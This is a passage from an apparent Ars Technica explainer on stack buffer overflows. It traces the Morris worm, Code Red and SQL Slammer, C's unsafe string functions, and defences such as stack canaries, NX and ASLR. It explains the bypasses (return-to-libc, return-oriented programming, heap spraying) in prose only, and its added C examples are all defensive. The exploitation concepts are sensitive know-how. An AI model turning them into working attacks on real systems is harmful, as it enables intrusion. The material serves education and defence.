This works because, again, the program and all its libraries occupy
the same memory addresses every time they run—even across reboots and
even across different machines. One of the interesting things about this
is that the library that provides the trampoline does not need to ever
perform a <code>call esp</code> itself. It just needs to offer the two bytes (in this case <code>0xff</code> and <code>0xd4</code>)
adjacent to each other. They could be part of some other instruction or
even a literal number; x86 isn't very picky about this kind of thing.
x86 instructions can be very long (up to 15 bytes!) and can be located
at any address. If the processor starts reading an instruction from the
middle—from the second byte of a four byte instruction, say—the result
can often be interpreted as a completely different, but still valid,
instruction. This can make it quite easy to find useful trampolines.<br />
Sometimes, however, the attack can't set the return address to <em>exactly</em>
where it needs to go. Although the memory layout is very similar, it
might vary slightly from machine to machine or run to run. For example,
the precise location of an exploitable buffer might vary back and forth
by a few bytes depending on the system's name or IP address, or because a
minor update to the software has made a very small change. To handle
this, it's useful to be able to specify a return address that's <em>roughly</em> correct but doesn't have to be <em>exactly</em> correct.<br />
This can be handled easily through a technique called the "NOP sled."
Instead of writing the shellcode directly into the buffer, the attacker
writes a large number of "NOP" instructions (meaning "no-op"; they're
instructions that don't actually do anything), sometimes hundreds of
them, before the real shellcode. To run the shellcode, the attacker only
needs to set the return address to <em>somewhere</em> among these NOP
instructions. As long as they land within the NOPs, the processor will
quickly run through them until it reaches the real shellcode.<br />
<h2>
Blame C</h2>
The core bug that enables these attacks, writing more to a buffer
than the buffer has space for, sounds like something that should be
simple to avoid. It's an exaggeration (but only a slight one) to lay the
blame entirely on the C programming language and its more or less
compatible offshoots, namely C++ and Objective-C. The C language is old,
widely used, and essential to our operating systems and software. It's
also appallingly designed, and while all these bugs are avoidable, C
does its damnedest to trip up the unwary.<br />
As an example of C's utter hostility to safe development, consider the function <code>gets()</code>. The <code>gets()</code>
function takes one parameter—a buffer—and reads a line of data from
standard input (which normally means "the keyboard"), then puts it into
the buffer. The observant may have noticed that <code>gets()</code> doesn't include a parameter for the buffer's size, and as an amusing quirk of C's design, there's no way for <code>gets()</code> to figure out the buffer's size for itself. And that's because <code>gets()</code>
just doesn't care: it will read from standard input until the person at
the keyboard presses return, then try to cram everything into the
buffer, even if the person typed far more than the buffer could ever
contain.<br />
This is a function that literally cannot be used safely. Since
there's no way of constraining the amount of text typed at the keyboard,
there's no way of preventing <code>gets()</code> from overflowing the
buffer it is passed. The creators of the C standard did soon realize the
problem; the 1999 revision to the C specification deprecated <code>gets()</code>,
while the 2011 update removed it entirely. But its existence—and
occasional usage—is a nice indication of the kind of traps that C will
spring on its users.<br />
The Morris worm, the first self-replicating malware that spread
across the early Internet in a couple of days in 1988, exploited this
function. The BSD 4.3 <code>fingerd</code> program listened for network connections on port 79, the <code>finger</code> port. <code>finger</code>
is an ancient Unix program and corresponding network protocol used to
see who's logged in to a remote system. It can be used in two ways; a
remote system can be queried to see everyone currently logged in.
Alternatively, it can be queried about a specific username, and it will
tell you some information about that user.<br />
Whenever a connection was made to the <code>finger</code> daemon, it would read from the network—using <code>gets()</code>—into a 512 byte buffer on the stack. In normal operation, <code>fingerd</code> would then spawn the <code>finger</code> program, passing it the username if there was one. The <code>finger</code> program was the one that did the real work of listing users or providing information about any specific user. <code>fingerd</code> was simply responsible for listening to the network and starting <code>finger</code> appropriately.<br />
Given that the only "real" parameter is a possible username, 512
bytes is plainly a huge buffer. Nobody is likely to have a username
anything like that long. But no part of the system actually enforced
that constraint because of the use of the awful <code>gets()</code> function. Send more than 512 bytes over the network and <code>fingerd</code> would overflow its buffer. So this is exactly what Robert Morris did: his exploit sent 537 bytes to <code>fingerd</code> (536 bytes of data plus a new-line character, which made <code>gets()</code>
stop reading input), overflowing the buffer and overwriting the return
address. The return address was set simply to the address of the buffer
on the stack.<br />
The Morris worm's executable payload was simple. It started with 400
NOP instructions, just in case the stack layout was slightly different,
followed by a short piece of code. This code spawned the shell, <code>/bin/sh</code>. This is a common choice of attack payload; the <code>fingerd</code> program ran as root, so when it was attacked to run a shell, that shell also ran as root. <code>fingerd</code>
was plumbed into the network, taking its "keyboard input" from the
network and likewise sending its output back over the network. Both of
these features are inherited by the shell executed by the exploit,
meaning that the root shell was now usable remotely by the attacker.<br />
While <code>gets()</code> is easy to avoid—in fact, even at the time of the Morris worm, a fixed version of <code>fingerd</code> that didn't use <code>gets()</code>
was available—other parts of C are harder to ignore and no less prone
to screw ups. C's handling of text strings is a common cause of
problems. The behavior mentioned previously—stopping at null bytes—comes
from C's string behavior. In C, a string is a sequence of characters,
followed by a null byte to terminate the string. C has a range of
functions for manipulating these strings. Perhaps the best pair are <code>strcpy()</code>, which copies a string from a source to a destination, and <code>strcat()</code>,
which appends a source string to a destination. Neither of these
functions has a parameter for the size of the destination buffer. Both
will merrily read from their source forever until they reach a null
character, filling up the destination and overflowing it without a care
in the world.<br />
Even when C's string handling functions <em>do</em> take a parameter
for the buffer size, they can do so in a way that leads to errors and
overflows. C offers a pair of siblings to <code>strcat()</code> and <code>strcpy()</code> called <code>strncat()</code> and <code>strncpy()</code>. The extra <code>n</code> in their names denotes that they take a size parameter, of sorts. But <code>n</code> is
not, as many naive C programmers believe, the size of the buffer being
written to; it is the number of characters from the source to copy. If
the source runs out of characters (because a null byte is reached) then <code>strncpy()</code> and <code>strncat()</code>
will make up the difference by copying more null bytes to the
destination. At no point do the functions ever care about the actual
size of the destination.<br />
Unlike <code>gets()</code>, it is possible to use these functions
safely; it's just difficult. C++ and Objective-C both include superior
alternatives to C's functions, making string manipulation much simpler
and safer, but they retain the old C capabilities for reasons of
backwards compatibility.<br />
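The contrast drawn above, as an added example that is not code from the original article: a bounded replacement for <code>gets()</code>, the <code>strncpy()</code> termination pitfall, and copy and append helpers that know the destination size. The helper names (<code>read_line</code>, <code>copy_bounded</code>, <code>append_bounded</code>, <code>strncpy_unterminated</code>) are hypothetical and the input lines are constructed.<br />

```c
#include <stdio.h>
#include <string.h>

/* Replacement for gets(): read one line into buf, whose capacity is size
 * bytes including the terminator. Returns the line length, -1 at end of
 * input, or -2 if the line did not fit. The rest of an over-long line is
 * discarded so the next call starts on a fresh line. */
long read_line(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return (long)(len - 1);
    }
    /* No newline stored: the buffer filled up or the input ended. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return (long)len;
    while (c != EOF && c != '\n')
        c = fgetc(in);
    buf[0] = '\0';
    return -2;
}

/* Copy src into dst (capacity dst_size) and always terminate dst.
 * Returns 0 on success, -1 if src did not fit (dst is then empty). */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0)
        return -1;
    if (n >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Append src to the string already in dst (capacity dst_size).
 * Returns 0 on success, -1 if dst is unterminated or the result would
 * not fit; dst is left unchanged on failure. */
int append_bounded(char *dst, size_t dst_size, const char *src)
{
    const char *end = memchr(dst, '\0', dst_size);
    if (end == NULL)
        return -1;
    size_t used = (size_t)(end - dst);
    size_t n = strlen(src);
    if (n >= dst_size - used)
        return -1;
    memcpy(dst + used, src, n + 1);
    return 0;
}

/* The strncpy() pitfall: when src has n or more characters, exactly n are
 * copied and no terminator is written. Returns 1 if dst ended up without
 * a terminating null byte. */
int strncpy_unterminated(const char *src)
{
    char dst[8];
    strncpy(dst, src, sizeof dst);
    return memchr(dst, '\0', sizeof dst) == NULL;
}

int main(void)
{
    char name[8];
    FILE *in = tmpfile();   /* constructed input standing in for the network */
    if (in == NULL)
        return 1;
    fputs("alice\nthis-line-is-too-long\nbob\n", in);
    rewind(in);
    long n;
    while ((n = read_line(in, name, sizeof name)) != -1) {
        if (n == -2)
            puts("rejected: line longer than the buffer");
        else
            printf("accepted: %s\n", name);
    }
    fclose(in);
    printf("strncpy left dst unterminated: %d\n",
           strncpy_unterminated("12345678"));
    return 0;
}
```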
Moreover, they retain C's fundamental weakness: buffers do not know
their own size, and the language never validates the reads and writes
performed on buffers, allowing them to overflow. This same behavior also
led to the recent <a href="http://arstechnica.com/security/2014/04/critical-crypto-bug-in-openssl-opens-two-thirds-of-the-web-to-eavesdropping/">Heartbleed bug</a> in OpenSSL. That wasn't an overflow; it was an over<em>read</em>; the C code in OpenSSL tried to read more from a buffer than the buffer contained, leaking sensitive information to the world.<br />
</div>
</div>
<div class="superscroll-placeholder loaded" data-page="2">
<div class="superscroll-content show">
<h2>
Fixing the leaks</h2>
Needless to say, it is not beyond the wit of mankind to develop
languages in which reads from and writes to buffers are validated and
so can never overflow. Compiled languages such as the Mozilla-backed <a href="http://arstechnica.com/information-technology/2015/05/mozilla-backed-rust-language-stabilizes-at-version-1-0/">Rust</a>,
safe runtime environments such as Java and .NET, and virtually every
scripting language like Python, JavaScript, Lua, and Perl are
immune to this problem (although .NET does allow developers to
explicitly turn off all the safeguards and open themselves up to this
kind of bug once more should they so choose).<br />
That the buffer overflow continues to be a feature of the security
landscape is a testament to C's enduring appeal. This is in no small
part due to the significant issue of legacy code. An awful lot of C code
still exists, including the kernel of every major operating system and
popular libraries such as OpenSSL. Even if developers want to use a safe
language such as C#, they may need to depend on a third-party library
written in C.<br />
Performance arguments are another reason for C's continued use,
though the wisdom of this approach was always a little unclear. It's
true that compiled C and C++ tend to produce fast executables, and in
some situations that matters a great deal. But many of us have
processors that spend the vast majority of their time idling; if we
could sacrifice, say, ten percent of the performance of our browsers in
order to get a cast iron guarantee that buffer overflows—in addition to
many other common flaws—were impossible, we might decide that would be a
fair trade-off, if only someone were willing to create such a browser.<br />
Nonetheless, C and its friends are here to stay; as such, so are buffer overflows.<br />
Some effort is made to stop the overflow errors before they bite
anyone. During development there are tools that can analyze source code
and running programs to try to detect dangerous constructs or overflow
errors before those bugs ever make their way into shipping software. New
tools such as <a href="https://code.google.com/p/address-sanitizer/">AddressSanitizer</a> and older ones such as <a href="http://valgrind.org/">Valgrind</a> both offer this kind of capability.<br />
However, these tools both require the active involvement of the
developer, meaning not all programs use them. Systemic protections that
strive to make buffer overflows less dangerous when they do occur can
protect a much greater variety of software. In recognition of this,
operating system and compiler developers have implemented a number of
systems to make exploiting these overflows harder.<br />
Some of these systems are intended to make specific attacker tasks
harder. One set of Linux patches made sure that system libraries were
all loaded at low addresses to ensure that they contained at least one
null byte in their address; this makes it harder to use their addresses
in any overflow that uses C string handling.<br />
Other defenses are more general. Many compilers today have some kind
of stack protection. A runtime-determined value known as a "canary" is
written onto the end of the stack near where the return address is
stored. At the end of every function, that value is checked for
modification before the return instruction is issued. If the canary
value has changed (because it has been overwritten in a buffer overflow)
then the program will immediately crash rather than continue.<br />
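A simulation of the canary check described above, as an added example that is not code from the original article or from any compiler. The frame is modelled as a plain byte array, so nothing here touches the real stack; the layout, the function names and the return-address value are assumptions made for the illustration.<br />

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

#define BUF_SIZE    16
#define CANARY_SIZE 8
#define RET_SIZE    sizeof(uint64_t)
#define FRAME_SIZE  (BUF_SIZE + CANARY_SIZE + RET_SIZE)

/* Simulated stack frame, lowest address first:
 *   [ buffer ][ canary ][ saved return address ]
 * An overflow that starts in the buffer must cross the canary before it
 * can reach the return address. */
struct frame {
    unsigned char bytes[FRAME_SIZE];
};

/* Choose the canary at run time. One byte is kept zero, as many real
 * implementations do, so that string functions which stop at a null
 * byte cannot write a matching canary back in one copy. */
void make_canary(unsigned char canary[CANARY_SIZE])
{
    FILE *rnd = fopen("/dev/urandom", "rb");
    if (rnd == NULL || fread(canary, 1, CANARY_SIZE, rnd) != CANARY_SIZE) {
        /* Fallback for the simulation only; this is not unpredictable. */
        uint64_t t = (uint64_t)time(NULL) * UINT64_C(0x9E3779B97F4A7C15);
        memcpy(canary, &t, CANARY_SIZE);
    }
    if (rnd != NULL)
        fclose(rnd);
    canary[0] = 0;
}

/* Function prologue: place the canary and the return address. */
void frame_enter(struct frame *f, const unsigned char *canary, uint64_t ret)
{
    memset(f->bytes, 0, BUF_SIZE);
    memcpy(f->bytes + BUF_SIZE, canary, CANARY_SIZE);
    memcpy(f->bytes + BUF_SIZE + CANARY_SIZE, &ret, RET_SIZE);
}

/* Stand-in for gets() or strcpy(): copies n bytes to the start of the
 * buffer without looking at BUF_SIZE. The copy is clamped to the frame
 * so that the simulation itself stays inside its array. */
void unchecked_copy(struct frame *f, const unsigned char *data, size_t n)
{
    if (n > FRAME_SIZE)
        n = FRAME_SIZE;
    memcpy(f->bytes, data, n);
}

/* Function epilogue: returns 0 and stores the saved return address in
 * *ret if the canary is intact, -1 if it changed. A real program aborts
 * at this point instead of returning an error. */
int frame_leave(const struct frame *f, const unsigned char *canary,
                uint64_t *ret)
{
    if (memcmp(f->bytes + BUF_SIZE, canary, CANARY_SIZE) != 0)
        return -1;
    memcpy(ret, f->bytes + BUF_SIZE + CANARY_SIZE, RET_SIZE);
    return 0;
}

/* Run one call with input_len bytes of 'A' as input. */
int run_case(size_t input_len)
{
    unsigned char canary[CANARY_SIZE], input[FRAME_SIZE];
    struct frame f;
    uint64_t ret = 0;
    memset(input, 'A', sizeof input);
    make_canary(canary);
    frame_enter(&f, canary, UINT64_C(0x401000)); /* constructed value */
    unchecked_copy(&f, input, input_len);
    return frame_leave(&f, canary, &ret);
}

int main(void)
{
    size_t lens[] = { 8, BUF_SIZE, BUF_SIZE + 1, FRAME_SIZE };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("%2zu input bytes: %s\n", lens[i],
               run_case(lens[i]) == 0 ? "canary intact, return allowed"
                                      : "canary changed, abort");
    return 0;
}
```

Input that fits the 16-byte buffer leaves the canary alone; a single extra byte already changes it, before the saved return address has been touched.<br />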
Perhaps the most important single protection is one variously known
as W^X ("write exclusive-or execute"), DEP ("data execution
prevention"), NX ("No Xecute"), XD ("eXecute Disable"), EVP ("Enhanced
Virus Protection," a rather peculiar term sometimes used by AMD), XN
("eXecute Never"), and probably more. The principle here is simple.
These systems strive to make memory either <em>writeable</em> (suitable for buffers) or <em>executable</em> (suitable for libraries and program code) but not <em>both</em>.
Thus, even if an attacker can overflow a buffer and control the return
address, the processor will ultimately refuse to execute the shellcode.<br />
Whichever name you use, this is an important technique not least
because it comes at essentially no cost. This approach leverages
protective measures built into the processor itself as part of the
hardware support for virtual memory.<br />
As described before, with virtual memory every process gets its own
set of private memory addresses. The operating system and processor
together maintain a mapping from virtual addresses to <em>something else</em>;
sometimes a virtual address corresponds to a physical memory address,
sometimes it corresponds to a portion of a file on disk, and sometimes
it corresponds to nothing at all because it has not been allocated. This
mapping is granular, typically using 4,096 byte chunks called <em>pages</em>.<br />
The data structures used to store the mapping don't just include the
location (physical memory, disk, nowhere) of each page; they also
contain (usually) three bits defining the page's protection: whether the
page is readable, whether it is writeable, and whether it is
executable. With this protection, areas of the process' memory that are
used for data, such as the stack, can be marked as readable and
writeable but not executable. Conversely, areas such as the program's
executable code and libraries can be marked as readable and executable
but not writeable.<br />
One of the great things about NX is that it can be applied to
existing programs retroactively just by updating the operating system to
one that supports it. Occasionally programs do run into problems.
Just-in-time compilers, used for things like Java and .NET, generate
executable code in memory at runtime, and as such need memory that is
both writeable and executable (though strictly, they don't need it to be
both things simultaneously). In the days before NX, any memory that was
readable was also executable, so these JIT compilers never had to do
anything special to their read-writeable buffers. With NX, they need to
make sure to change the memory protection from read-write to
read-execute.<br />
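One way to check the page protections described above from the defender's side, as an added example that is not code from the original article: it parses a process memory map in the format Linux exposes in <code>/proc/&lt;pid&gt;/maps</code> (an assumption, the article names no interface) and reports mappings that are both writable and executable, and whether the stack is executable. The two sample maps are constructed and the function names are hypothetical.<br />

```c
#include <stdio.h>
#include <string.h>

struct wx_report {
    int mappings;       /* lines parsed successfully */
    int writable_exec;  /* mappings that are writable and executable */
    int stack_exec;     /* 1 if the [stack] mapping is executable */
};

/* Constructed sample: code is r-x, data and stack are rw-. */
static const char SAMPLE_HARDENED[] =
    "00400000-00452000 r-xp 00000000 08:02 173521 /usr/bin/example\n"
    "00651000-00652000 rw-p 00051000 08:02 173521 /usr/bin/example\n"
    "7f2c4a000000-7f2c4a1b0000 r-xp 00000000 08:02 135522 /lib/libc.so.6\n"
    "7ffd1c2e0000-7ffd1c301000 rw-p 00000000 00:00 0 [stack]\n";

/* Constructed sample: an anonymous buffer left rwx and an executable stack. */
static const char SAMPLE_WEAK[] =
    "00400000-00452000 r-xp 00000000 08:02 173521 /usr/bin/example\n"
    "7f2c4b000000-7f2c4b010000 rwxp 00000000 00:00 0\n"
    "7ffd1c2e0000-7ffd1c301000 rwxp 00000000 00:00 0 [stack]\n";

/* Parse one line: "start-end perms offset dev inode [path]".
 * Returns 1 if the line was well formed and has been counted. */
static int audit_line(const char *line, struct wx_report *r)
{
    unsigned long long start = 0, end = 0;
    char perms[5] = "";
    char path[256] = "";
    int n = sscanf(line, "%llx-%llx %4s %*s %*s %*s %255[^\n]",
                   &start, &end, perms, path);
    if (n < 3 || strlen(perms) != 4 || end <= start)
        return 0;
    int writable = perms[1] == 'w';
    int executable = perms[2] == 'x';
    r->mappings++;
    if (writable && executable)
        r->writable_exec++;
    if (executable && strcmp(path, "[stack]") == 0)
        r->stack_exec = 1;
    return 1;
}

/* Audit a whole map given as newline-separated text. */
struct wx_report audit_maps(const char *text)
{
    struct wx_report r = { 0, 0, 0 };
    while (*text != '\0') {
        const char *nl = strchr(text, '\n');
        size_t len = nl ? (size_t)(nl - text) : strlen(text);
        char line[512];
        if (len < sizeof line) {
            memcpy(line, text, len);
            line[len] = '\0';
            audit_line(line, &r);
        }
        text += len + (nl ? 1 : 0);
    }
    return r;
}

int main(void)
{
    static char text[1 << 16];
    const char *src = SAMPLE_WEAK;
    FILE *f = fopen("/proc/self/maps", "r");  /* present on Linux only */
    if (f != NULL) {
        size_t n = fread(text, 1, sizeof text - 1, f);
        text[n] = '\0';
        fclose(f);
        src = text;
    }
    struct wx_report r = audit_maps(src);
    printf("%d mappings, %d writable+executable, stack executable: %s\n",
           r.mappings, r.writable_exec, r.stack_exec ? "yes" : "no");
    return (r.writable_exec || r.stack_exec) ? 1 : 0;
}
```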
The need for something like NX was clear, especially for Microsoft.
In the early 2000s, a pair of worms showed that the company had some
serious code security problems: Code Red, which infected as many as
359,000 Windows 2000 systems running Microsoft's IIS Web server in July
2001, and SQL Slammer, which infected more than 75,000 systems running
Microsoft's SQL Server database in January 2003. These were high-profile
embarrassments.<br />
Both of them exploited stack buffer overflows, and strikingly, though
they came 13 and 15 years after the Morris worm, the method of
exploitation was virtually identical. An exploit payload was placed into
the buffer on the stack and the return address overwritten to execute
it. (The only slight nuance was that both of these used the trampoline
technique. Instead of setting the return address directly to the address
of the stack, they set the return address to an instruction that in
turn passes execution to the stack.)<br />
Naturally, these worms were also advanced in other ways. Code Red's
payload didn't just self-replicate; it also defaced webpages and
attempted to perform denial of service attacks. SQL Slammer packed
everything it needed to find new machines to exploit and spread through a
network in just a few hundred bytes, and it left no footprint on
machines it infected; reboot and it was gone. Both worms also worked on
an Internet that was enormously larger than the one the Morris worm
worked with, and hence they infected many more machines.<br />
But the central issue, that of a straightforwardly exploitable stack
buffer overflow, was an old one. These worms were both major news and
made many people question the use of Windows in any kind of an
Internet-facing, server capacity. Microsoft's response was to start
taking security seriously. Windows XP Service Pack 2 was the first real
product with this mindset. It utilized a number of software changes,
including a software firewall, changes to Internet Explorer to prevent
silent installation of toolbars, plugins—and NX support.<br />
Hardware supporting NX has been mainstream since 2004, when Intel
introduced the Prescott Pentium 4, and operating system support for NX
has been widespread since Windows XP Service Pack 2. Windows 8 forced
the issue even more by cutting off support for older processors that
didn't have NX hardware.<br />
<h2>
Beyond NX</h2>
In spite of the spread of NX support, buffer overflows remain a
security issue to this day. That's because a number of techniques were
devised to bypass NX.<br />
The first of these was similar to the trampolining trick already
described to pass control to the shellcode in a stack buffer via an
instruction found in another library or executable. Instead of looking
for a fragment of executable code that will pass execution directly back
to the stack, the attacker looks for a fragment that does something
useful in its own right.<br />
Perhaps the best candidate for this is the Unix <code>system() </code>function. <code>system()</code>
takes one parameter: the address of a string representing a command
line to be executed, and traditionally that parameter is passed on the
stack. The attacker can create a command-line string and put it in the
buffer to be overflowed, and because (traditionally) things didn't move
around in memory, the address of that string would be known and could be
put on the stack as part of the attack. The overwritten return address
in this situation isn't set to the address of the buffer; it's set to
the address of the <code>system()</code> function. When the function with the buffer overflow finishes, instead of returning to its caller, it runs the <code>system()</code> function to execute a command of the attacker's choosing.<br />
This neatly bypasses NX. The <code>system()</code> function, being
part of a system library, is already executable. The exploit doesn't
have to execute code from the stack; it just has to <em>read</em> the
command line from the stack. This technique is called "return-to-libc"
and was invented in 1997 by Russian computer security expert <a href="http://insecure.org/sploits/linux.libc.return.lpr.sploit.html">Solar Designer</a>. (libc is the name of the Unix library that implements many key functions, including <code>system()</code>, and is typically found loaded into every single Unix process, so it makes a good target for this kind of thing.)<br />
While useful, this technique can be somewhat limited. Often functions
don't take their arguments from the stack; they expect them to be
passed in registers. Passing in command-line strings to execute is nice,
but it often involves those annoying nulls, which can foul everything
up. Moreover, it makes chaining multiple function calls very difficult.
It can be done—provide multiple return addresses instead of one—but
there's no provision for changing the order of arguments, using return
values, or anything else.<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="2143" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-rop.png"><img height="257" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-rop-300x257.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
Instead of filling the buffer with shellcode, we fill it with a
sequence of return addresses and data. These return addresses pass
control to existing fragments of executable code within the victim
program and its libraries. Each fragment of code performs an operation
and then returns, passing control to the next return address.</div>
</figcaption></figure>
Over the years, return-to-libc was generalized to alleviate these restrictions. In late 2001, a <a href="http://phrack.org/issues/58/4.html">number of ways</a>
to extend return-to-libc to make multiple function calls were
documented, along with solutions for the null byte problem. These
techniques were nonetheless limited. A more complicated technique
formally described <a href="http://cseweb.ucsd.edu/%7Ehovav/dist/geometry.pdf">in 2007</a> for the most part lifted all these restrictions: return-oriented-programming (ROP).<br />
This uses the same principle as return-to-libc and trampolining
but generalized further still. Where trampolining uses a single fragment
of code to pass execution to shellcode in a buffer, ROP uses <em>lots</em>
of fragments of code, called "gadgets" in the original ROP paper. Each
gadget follows a particular pattern: it performs some operation (putting
a value in a register, writing to memory, adding two registers, etc.)
followed by a return instruction. The same property that makes x86 good
for trampolining works here too; the system libraries loaded into a
process contain <em>many hundreds</em> of sequences that can be interpreted as "perform an action, then return" and hence can be used in ROP-based attacks.<br />
The gadgets are all chained together by a long sequence of return
addresses (and any useful or necessary data) written to the stack as
part of the buffer overflow. The return instructions leap from gadget to
gadget with the processor rarely or never <em>calling</em> functions, only ever <em>returning</em>
from them. Remarkably, it was discovered that, at least on x86, the
number and variety of useful gadgets is such that an attacker can
generally do <em>anything</em>; this weird subset of x86, used in a
peculiar way, is often Turing complete (though the exact range of
capabilities will depend on which libraries a given program has loaded
and hence which gadgets are available).<br />
As with return-to-libc, all the actual <em>executable code</em> is
taken from system libraries, and so NX protection is useless. The
greater flexibility of the approach means that exploits can do the
things that are difficult even with chained return-to-libc, such as
calling functions that take arguments in registers, using return values
from one function as an argument for another, and much more besides.<br />
The ROP payloads vary. Sometimes they're simple "create a
shell"-style code. Another common option is to use ROP to call a system
function to change the NX state of a page of memory, flipping it from
being writable to being executable. Doing this, an attacker can use a
conventional, non-ROP payload, using ROP only to make the non-ROP
payload executable.<br />
</div>
</div>
<h2>
Getting random</h2>
This weakness of NX has long been recognized, and a recurring theme
runs throughout all these exploits: the attacker knows the memory
addresses of the stack and system libraries ahead of time. Everything is
contingent on this knowledge, so an obvious thing to try is removing
that knowledge. This is what Address Space Layout Randomization (ASLR)
does: it randomizes the position of the stack and the in-memory location
of libraries and executables. Typically these will change either every
time a program is run, every time a system is booted, or some
combination of the two.<br />
This greatly increases the difficulty of exploitation, because all of
a sudden, the attacker doesn't know where the ROP instruction fragments
will be in memory, or even where the overflowed stack buffer will be.<br />
ASLR in many ways goes hand in hand with NX, because it shores up the
big return-to-libc and return-oriented-programming gaps that NX leaves.
Unfortunately, it's a bit more intrusive than NX. Except for JIT
compilers and a few other unusual things, NX could be safely added to
existing programs. ASLR is more problematic; programs and libraries need
to ensure that they do not make any assumptions about the address
they're loaded at.<br />
On Windows, for example, this shouldn't be a huge issue for DLLs.
DLLs on Windows have always supported being loaded at different
addresses, but it could be an issue for EXEs. Before ASLR, EXEs would
always be loaded at an address of <code>0x0040000</code> and could
safely make assumptions on that basis. After ASLR, that's no longer the
case. To make sure that there won't be any problems, Windows by default
requires executables to indicate that they specifically support ASLR and
opt in to enabling it. The security conscious can, however, force
Windows to enable it for all executables and libraries even if programs
don't indicate that they support it. This is almost always fine.<br />
The situation is <a href="http://www.cert.org/blogs/certcc/post.cfm?EntryID=191">perhaps worse</a>
on x86 Linux, as the approach used for ASLR on that platform exacts a
performance cost that may be as high as 26 percent. Moreover, this
approach absolutely <em>requires</em> executables and libraries to be
compiled with ASLR support. There's no way for an administrator to
mandate the use of ASLR as there is in Windows. (x64 does not quite
eliminate the performance cost of the Linux approach, but it does
greatly alleviate it.)<br />
When ASLR is enabled, it provides a great deal of protection against
easy exploitation. ASLR still isn't perfect, however. For example, one
restriction is the amount of randomness it can provide. This is
especially acute on 32-bit systems. Although the memory space has more
than 4 billion different addresses, not all of those addresses are
available for loading libraries or placing the stack.<br />
Instead, it's subject to various constraints. Some of these are broad
goals. Generally, the operating system likes to keep libraries loaded
fairly close together at one end of the process' address space, so that
as much contiguous empty space is available to the application as
possible. You wouldn't want to have one library loaded every 256MB
throughout the memory space, because the biggest single allocation you'd
be able to make would be a little less than 256MB, which limits the
ability of applications to work on big datasets.<br />
Executables and libraries generally have to be loaded so that they
start on, at the very least, a page boundary. Normally, this means they
must be loaded at an address that's a multiple of 4,096. Platforms can
have similar conventions for the stack; Linux, for example, starts the
stack on a multiple of 16 bytes. Systems under memory stress sometimes
have to further reduce the randomness in order to fit everything in.<br />
The impact of this varies, but it means that attackers can sometimes
guess what an address will be and have a reasonable probability of
guessing right. Even a fairly low chance—one in 256, say—can be enough
in some situations. When attacking a Web server that will automatically
restart crashed processes, it may not matter that 255 out of 256 attacks
crash the server. It will simply be restarted, and the attacker can try
again.<br />
But on 64-bit systems, there's so much address space that this kind
of guessing approach is untenable. The attacker could be stuck with a
one in a million or one in a billion chance of getting it right, and
that's a small enough chance as to not matter.<br />
Guessing and crashing isn't much good for attacks on, say, browsers;
no user is going to restart a browser 256 times in a row just so that an
attacker can strike it lucky. As a result, exploiting this kind of flaw
on a system with both NX and ASLR can't be done without help.<br />
This help can come in many forms. One route in browsers is to use
JavaScript or Flash—both of which contain JIT compilers that generate
executable code—to fill large portions of memory with carefully
constructed executable code. This produces a kind of large-scale NOP
sled in a technique known as "heap spraying." Another approach is to
find a secondary bug that inadvertently reveals memory addresses of
libraries or of the stack, giving the attacker enough information to
construct a custom set of ROP return addresses.<br />
A third approach was again common in browsers: take advantage of
libraries that don't use ASLR. Old versions of, for example, Adobe's PDF
plugin or Microsoft's Office browser plugins didn't enable ASLR, and
Windows by default doesn't force ASLR on non-ASLR code. If attackers
could force such a library to load (by, for example, loading a PDF into a
hidden browser frame) then they no longer needed to be too concerned
about ASLR; they could just use that non-ASLR library for their ROP
payload.<br />
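A defender's check for the gap described above, as an added example that is not from the original article: this C program reads a module's PE headers and reports whether the module opts in to ASLR (the DYNAMICBASE flag) and still carries its relocations. The sample headers are constructed in memory, and the function and file names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Flag values from the PE/COFF specification. */
#define PE_RELOCS_STRIPPED 0x0001u /* COFF Characteristics: image cannot be rebased */
#define PE_HIGH_ENTROPY_VA 0x0020u /* DllCharacteristics: 64-bit high-entropy ASLR */
#define PE_DYNAMIC_BASE    0x0040u /* DllCharacteristics: image opts in to ASLR */
#define PE_NX_COMPAT       0x0100u /* DllCharacteristics: image is DEP/NX compatible */

enum { PE_OK = 0, PE_TRUNCATED = -1, PE_NOT_PE = -2 };

struct pe_flags { uint16_t file_chars, dll_chars; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* Parse the headers of a PE image held in buf. The file is untrusted input,
 * so every offset is checked against len before it is dereferenced. */
int pe_read_flags(const uint8_t *buf, size_t len, struct pe_flags *out)
{
    if (len < 0x40) return PE_TRUNCATED;
    if (buf[0] != 'M' || buf[1] != 'Z') return PE_NOT_PE;
    uint32_t pe_off = rd32(buf + 0x3C);             /* e_lfanew */
    /* need the signature (4), COFF header (20) and 72 optional-header bytes */
    if (pe_off > len || len - pe_off < 96u) return PE_TRUNCATED;
    if (memcmp(buf + pe_off, "PE\0\0", 4) != 0) return PE_NOT_PE;
    const uint8_t *coff = buf + pe_off + 4;
    if (rd16(coff + 16) < 72) return PE_TRUNCATED;  /* SizeOfOptionalHeader */
    const uint8_t *opt = coff + 20;
    uint16_t magic = rd16(opt);                     /* 0x10b PE32, 0x20b PE32+ */
    if (magic != 0x10b && magic != 0x20b) return PE_NOT_PE;
    out->file_chars = rd16(coff + 18);              /* COFF Characteristics */
    out->dll_chars = rd16(opt + 70);                /* same offset in both formats */
    return PE_OK;
}

/* 1 = module can be randomized, 0 = module has not opted in, <0 = parse error. */
int pe_uses_aslr(const uint8_t *buf, size_t len)
{
    struct pe_flags f;
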